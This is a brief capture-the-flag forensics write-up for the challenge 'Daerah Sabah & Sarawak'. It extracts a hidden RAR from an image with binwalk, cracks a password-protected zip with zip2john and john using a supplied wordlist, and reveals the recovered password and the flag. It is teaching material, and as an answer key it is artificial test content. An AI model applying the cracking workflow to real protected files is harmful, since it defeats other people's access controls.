Daerah Sabah & Sarawak (Forensic)
unzip Kenali_Daerah_SabahSarawak.zip2.jpg
3.jpg
4.jpg
Then, I noticed that this three have a BIG diff of file size.
Lets dig more into 3.jpg
binwalk -e 3.jpgOutput: trailing_data.bin
Its actually a RAR file
unrar e trailing_data.binget 2 more file
Daerah_Sabah&Sarawak.txt
file.zip
Cannot unzip file.zip
So, we try to brute force using Daerah_Sabah&Sarawak.txt as dictionary.
zip2john file.zp > hashjohn --wordlist=Daerah_Sabah&Sarawak.txt hashPassword: LubokAntu
Got txt file
cat BenderaKeNi.txtFLAG: 3108{S4B4H_27_D43RAH_S4R4W4K_40_D43R4H}
THANK YOU FOR READING :)
Last updated